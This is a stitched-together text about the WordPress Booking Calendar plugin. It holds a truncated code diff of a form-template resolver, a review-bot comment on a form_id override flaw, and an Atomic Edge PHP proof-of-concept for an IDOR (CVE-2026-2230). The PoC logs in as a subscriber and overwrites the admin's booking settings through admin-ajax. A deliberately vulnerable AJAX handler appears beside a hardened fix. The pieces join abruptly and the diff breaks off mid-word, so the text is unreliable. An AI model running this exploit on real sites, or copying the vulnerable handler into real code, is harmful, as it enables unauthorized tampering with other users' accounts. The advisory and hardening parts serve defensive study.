 		$found = self::try_find_row( $form_slug, $status, $owner_user_id, $fallback_chain );
 		if ( ! $found && ( $owner_user_id > 0 ) ) {
 			$found = self::try_find_row( $form_slug, $status, 0, $fallback_chain );
@@ -205,7 +193,6 @@
 				'status'         => (string) $found['status'],
 				'owner_user_id'  => (int) $found['owner_user_id'],
 				'resource_id'    => (int) $resource_id,
-				'context'        => (string) $context,
 			);

 			// Pass form_id if known (fast, deterministic).
@@ -249,7 +236,7 @@
 	 */
 	private static function try_find_row( $slug, $status, $owner_user_id, &$chain ) {

-		$slug          = sanitize_key( (string) $slug );
+		$slug          = sanitize_text_field( (string) $slug );
 		$status        = sanitize_key( (string) $status );
 		$owner_user_id = max( 0, (int) $owner_user_id );

@@ -299,3 +286,257 @@
 		);
 	}
 }
+
+
+/**
+ * BFB resolver for "Booking Form Data" template (content_form).
+ *
+ * Purpose:
+ * - When BFB DB engine is used for a form, the correct booking "data template"
+ *   must come from wp_booking_form_structures.content_form (not booking_form_show option).
+ * - This is used by wpbc_get__booking_form_data__show() to replace [field] shortcodes
+ *   with values from booking form_data string.
+ *
+ * Design notes:
+ * - Uses WPBC_FE_Form_Source_Resolver::resolve() to keep the same decision chain as front-end rendering.
+ * - Reads the template via wpbc_bfb_get_booking_form_pair() (must expose content_form).
+ * - Safe no-op when BFB / resolver is not available.
+ *
+ * @since 11.0.x
+ */
+class WPBC_BFB_Booking_Data_Content_Resolver {
+
+	/**
+	 * Try to override legacy $booking_form_show by BFB content_form (resolver-driven).
+	 *
+	 * @param string $booking_form_show Legacy resolved booking_form_show.
+	 * @param int    $resource_id       Booking resource ID.
+	 * @param string $form_slug         Form slug/name (legacy: 'standard' or custom form name).
+	 * @param string $form_data         Booking form_data string from DB.
+	 * @param array  $params            Optional. Context override (e.g. form_status/preview token).
+	 *
+	 * @return string Possibly overridden template.
+	 */
+	public static function maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $form_slug, $form_data, $params = array() ) {
+
+		$booking_form_show = (string) $booking_form_show;
+		$resource_id       = (int) $resource_id;
+		$form_slug         = (string) $form_slug;
+		$form_data         = (string) $form_data;
+
+		if ( '' === $form_slug ) {
+			$form_slug = 'standard';
+		}
+
+		// Hard requirements for BFB resolver path.
+		if ( ! class_exists( 'WPBC_FE_Form_Source_Resolver' ) ) {
+			return $booking_form_show;
+		}
+		if ( ! class_exists( 'WPBC_BFB_Form_Loader' ) ) {
+			return $booking_form_show;
+		}
+
+		// ------------------------------------------------------------
+		// Preview-aware context (critical fix).
+		// ------------------------------------------------------------
+		$ctx = array();
+		if ( function_exists( 'wpbc_get_request_form_context' ) ) {
+			$ctx = wpbc_get_request_form_context();
+		}
+		$ctx = wp_parse_args( ( is_array( $params ) ? $params : array() ), ( is_array( $ctx ) ? $ctx : array() ) );
+
+		$form_status = ( isset( $ctx['form_status'] ) ) ? sanitize_key( $ctx['form_status'] ) : 'published';
+		if ( in_array( $form_status, array( 'publish', 'published' ), true ) ) {
+			$form_status = 'published';
+		}
+		if ( 'preview' !== $form_status ) {
+			$form_status = 'published';
+		}
+
+		// If preview session has exported content_form payload => use it (fast + correct).
+		if ( ( 'preview' === $form_status ) && function_exists( 'wpbc_bfb_preview__maybe_get_payload_from_context' ) ) {
+
+			$payload = wpbc_bfb_preview__maybe_get_payload_from_context( $ctx );
+
+			if ( ! empty( $payload ) && isset( $payload['content_form'] ) && ( '' !== (string) $payload['content_form'] ) ) {
+
+				$content_form = (string) $payload['content_form'];
+
+				// Keep legacy behavior: custom html shortcodes + language.
+				$content_form = wpbc_bf__replace_custom_html_shortcodes( $content_form );
+				$content_form = wpbc_lang( $content_form );
+
+				return $content_form;
+			}
+		}
+
+		// ------------------------------------------------------------
+		// Resolver-driven DB load (status must NOT be hard-coded).
+		// ------------------------------------------------------------
+		$custom_params = array();
+
+		// Optional: allow future-proof explicit form_id embedded into booking form_data.
+		$bfb_form_id = self::get_bfb_form_id_from_form_data( $form_data, $resource_id );
+		if ( $bfb_form_id > 0 ) {
+			$custom_params['bfb_form_id'] = (int) $bfb_form_id;
+		}
+
+		$req = array(
+			'resource_id'     => $resource_id,
+			'form_slug'       => $form_slug,
+			'form_status'     => $form_status, // <-- critical: use preview/published
+			'custom_params'   => $custom_params,
+			'legacy_instance' => null,
+
+			// Future-proof: let filters access the full preview context if they need it.
+			'ctx'             => $ctx,
+		);
+
+		$resolved = WPBC_FE_Form_Source_Resolver::resolve( $req );
+
+		// If preview status is requested but nothing found, try published as fallback (keeps BFB).
+		if ( ( empty( $resolved['engine'] ) || ( 'bfb_db' !== $resolved['engine'] ) ) && ( 'preview' === $form_status ) ) {
+			$req['form_status'] = 'published';
+			$resolved = WPBC_FE_Form_Source_Resolver::resolve( $req );
+		}
+
+		if ( empty( $resolved['engine'] ) || ( 'bfb_db' !== $resolved['engine'] ) ) {
+			return $booking_form_show;
+		}
+
+		$bfb_loader_args = array();
+		if ( ! empty( $resolved['bfb_loader_args'] ) && is_array( $resolved['bfb_loader_args'] ) ) {
+			$bfb_loader_args = $resolved['bfb_loader_args'];
+		}
+
+		// Keep old behavior: allow explicit override from booking data (if present).
+		if ( ( $bfb_form_id > 0 ) && empty( $bfb_loader_args['form_id'] ) ) {
+			$bfb_loader_args['form_id'] = (int) $bfb_form_id;
+		}
+
+		// Signal loader that we need the "content_form" (booking fields data template).
+		$bfb_loader_args['return'] = 'content_form';
+
+		$bfb_pair = wpbc_bfb_get_booking_form_pair( $bfb_loader_args );
+
+		$content_form = self::extract_content_form_from_pair( $bfb_pair );
+
+		if ( '' === trim( $content_form ) ) {
+			return $booking_form_show;
+		}
+
+		// Keep legacy behavior: custom html shortcodes + language.
+		$content_form = wpbc_bf__replace_custom_html_shortcodes( $content_form );
+		$content_form = wpbc_lang( $content_form );
+
+		return $content_form;
+	}
+
+
+	/**
+	 * Extract content template from loader return (supports multiple formats).
+	 *
+	 * Supported formats:
+	 * 1) array( 'content' => '...' )                                  <- current WPBC_BFB_Form_Loader output
+	 * 2) array( 'content_form' => '...' )                             <- optional future alias
+	 * 3) array( 'form' => array( 'content' => '...' ) )               <- future-proof
+	 * 4) array( 'form' => array( 'content_form' => '...' ) )          <- future-proof
+	 *
+	 * @param mixed $bfb_pair Loader result.
+	 *
+	 * @return string
+	 */
+	private static function extract_content_form_from_pair( $bfb_pair ) {
+
+		if ( ! is_array( $bfb_pair ) ) {
+			return '';
+		}
+
+		/**
+		 * Safety: if loader fell back to legacy, do NOT override booking_form_show.
+		 * WPBC_BFB_Form_Loader returns 'source' => 'builder'|'legacy'.
+		 */
+		if ( isset( $bfb_pair['source'] ) && ( 'builder' !== $bfb_pair['source'] ) ) {
+			return '';
+		}
+
+		// Current loader output key.
+		if ( isset( $bfb_pair['content'] ) && is_string( $bfb_pair['content'] ) ) {
+			return (string) $bfb_pair['content'];
+		}
+
+		// Optional alias (if some implementations already return it).
+		if ( isset( $bfb_pair['content_form'] ) && is_string( $bfb_pair['content_form'] ) ) {
+			return (string) $bfb_pair['content_form'];
+		}
+
+		// Future-proof nested formats.
+		if ( isset( $bfb_pair['form'] ) && is_array( $bfb_pair['form'] ) ) {
+
+			if ( isset( $bfb_pair['form']['content'] ) && is_string( $bfb_pair['form']['content'] ) ) {
+				return (string) $bfb_pair['form']['content'];
+			}
+
+			if ( isset( $bfb_pair['form']['content_form'] ) && is_string( $bfb_pair['form']['content_form'] ) ) {
+				return (string) $bfb_pair['form']['content_form'];
+			}
+		}
+
+		return '';
+	}
+
+
+	/**
+	 * (Optional / future-proof) Parse BFB form_id stored inside booking form_data.
+	 *
+	 * Supported patterns:
+	 * - "wpbc_bfb_form_id{resource_id}^{ID}"
+	 * - "wpbc_bfb_form_id^{ID}"
+	 *
+	 * @param string $form_data
+	 * @param int    $resource_id
+	 *
+	 * @return int
+	 */
+	private static function get_bfb_form_id_from_form_data( $form_data, $resource_id ) {
+
+		$form_data   = (string) $form_data;
+		$resource_id = (int) $resource_id;
+
+		if ( '' === $form_data ) {
+			return 0;
+		}
+
+		$prefixes = array(
+			'wpbc_bfb_form_id' . $resource_id . '^',
+			'wpbc_bfb_form_id^',
+		);
+
+		foreach ( $prefixes as $prefix ) {
+
+			$pos = strpos( $form_data, $prefix );
+			if ( false === $pos ) {
+				continue;
+			}
+
+			$chunk = substr( $form_data, $pos + strlen( $prefix ) );
+
+			// Ends at "~" if present.
+			if ( false !== strpos( $chunk, '~' ) ) {
+				$chunk = substr( $chunk, 0, strpos( $chunk, '~' ) );
+			}
+
+			$chunk = trim( $chunk );
+			if ( '' === $chunk ) {
+				co
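Review bot: get_bfb_form_id_from_form_data() lets the booking's stored form_data choose the BFB form: `self::get_bfb_form_id_from_form_data( $form_data, $resource_id )` feeds custom_params['bfb_form_id'] into the resolver and, at `$bfb_loader_args['form_id'] = (int) $bfb_form_id;`, overrides the loader's form_id whenever the resolver left it empty. form_data is the string the visitor submitted with the booking (`'form_data' => $request_params['formdata']` in the first hunk of this patch), so a submitter who embeds `wpbc_bfb_form_id^{ID}` picks which form's content_form renders their booking; the loader is not in this diff, so it is unclear whether it checks owner_user_id, and in a MultiUser setup that could mean another owner's template. Before the override, check that the parsed ID resolves to a form the resource owner may use (same owner_user_id or global), or leave the "future-proof" parsing out until something actually produces that token. Smaller: `@since 11.0.x` is a placeholder and should carry the real release number, and `wpbc_bfb_get_booking_form_pair( $bfb_loader_args )` is called without a function_exists() guard even though the method guards the two classes above it.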

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2230 - Booking Calendar <= 10.14.14 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary User Settings Modification
// Note: the opening <?php tag must precede the header comment; placed after it, PHP would emit the comment as literal output.

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
$target_user_id = 1; // Admin user ID to target

// Step 1: Authenticate to WordPress
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2230_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false
]);

$response = curl_exec($ch);

// Step 2: Extract nonce from booking settings page
$settings_url = str_replace('/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=wpbc-settings', $target_url);
curl_setopt_array($ch, [
    CURLOPT_URL => $settings_url,
    CURLOPT_POST => false,
    CURLOPT_HTTPGET => true
]);

$settings_page = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would parse HTML)
$nonce = 'extracted_nonce_here'; // Would be extracted via regex from settings_page

// Step 3: Exploit IDOR vulnerability
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'wpbc_ajax_save_user_settings',
        'user_id' => $target_user_id, // Controlled parameter - change to target other users
        'settings_key' => 'booking_general_settings',
        'settings_value' => '{"calendar_view":"disabled","show_prices":false}',
        'nonce' => $nonce
    ])
]);

$exploit_response = curl_exec($ch);

// Check if exploit succeeded
if (strpos($exploit_response, 'success') !== false) {
    echo "[+] Successfully modified user $target_user_id settings\n";
    echo "Response: $exploit_response\n";
} else {
    echo "[-] Exploit failed\n";
    echo "Response: $exploit_response\n";
}

curl_close($ch);
unlink($cookie_file);

?>
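As an added illustration for defenders (this is not code from the Booking Calendar plugin or from the Atomic Edge PoC), the PHP below shows a WordPress AJAX handler that trusts the request's user_id, the pattern the PoC above depends on, next to a hardened handler that performs the object-level authorization check. The action name and the user_id, settings_key, settings_value and nonce parameters are taken from the PoC; the function names, the wpbc_user_settings nonce action, the edit_user capability choice and the field allow-list are assumptions made for the example.

```php
<?php
// Added example, not the plugin's own code. Function names, the nonce action
// and the settings allow-list are assumptions; the request parameters match
// the PoC above.

// --- Vulnerable pattern: the caller names which user's settings to write. ---
function example_wpbc_save_user_settings_vulnerable() {
    // A nonce check does not help here: it proves the request came from a
    // logged-in session, not that $user_id belongs to that session's user.
    check_ajax_referer( 'wpbc_user_settings', 'nonce' );

    $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $key     = isset( $_POST['settings_key'] ) ? sanitize_key( $_POST['settings_key'] ) : '';
    $value   = isset( $_POST['settings_value'] ) ? wp_unslash( $_POST['settings_value'] ) : '';

    update_user_meta( $user_id, $key, $value ); // any user id, any meta key
    wp_send_json_success();
}

// --- Hardened pattern: bind the target to the caller or require the right
//     to edit that user, and allow-list what may be written. ---
function example_wpbc_save_user_settings_hardened() {
    check_ajax_referer( 'wpbc_user_settings', 'nonce' );

    $current_user_id = get_current_user_id();
    if ( 0 === $current_user_id ) {
        wp_send_json_error( array( 'message' => 'not logged in' ), 401 );
    }

    // Default to the caller; only honour a different id when the caller may
    // edit that user (edit_user maps to the edit_users capability for others).
    $requested_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : $current_user_id;
    if ( $requested_id !== $current_user_id && ! current_user_can( 'edit_user', $requested_id ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // The endpoint decides which meta keys it writes; the client does not.
    $allowed_keys = array( 'booking_general_settings' );
    $key = isset( $_POST['settings_key'] ) ? sanitize_key( $_POST['settings_key'] ) : '';
    if ( ! in_array( $key, $allowed_keys, true ) ) {
        wp_send_json_error( array( 'message' => 'unknown settings key' ), 400 );
    }

    // Decode the JSON payload and rebuild it from known fields with expected
    // types, so unexpected keys or values are never persisted.
    $raw     = isset( $_POST['settings_value'] ) ? wp_unslash( $_POST['settings_value'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( array( 'message' => 'invalid payload' ), 400 );
    }
    $view  = isset( $decoded['calendar_view'] ) ? (string) $decoded['calendar_view'] : 'enabled';
    $clean = array(
        'calendar_view' => in_array( $view, array( 'enabled', 'disabled' ), true ) ? $view : 'enabled',
        'show_prices'   => ! empty( $decoded['show_prices'] ),
    );

    update_user_meta( $requested_id, $key, wp_json_encode( $clean ) );
    wp_send_json_success( array( 'user_id' => $requested_id ) );
}

// Register only the hardened handler for the action the PoC targets.
add_action( 'wp_ajax_wpbc_ajax_save_user_settings', 'example_wpbc_save_user_settings_hardened' );
```

The point worth noting is that the nonce the PoC fetches in Step 2 is a legitimate one, so check_ajax_referer alone would not have blocked Step 3; the control that matters is the comparison of the requested id against get_current_user_id() before the write, with current_user_can( 'edit_user', $requested_id ) as the only path to another user's record.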
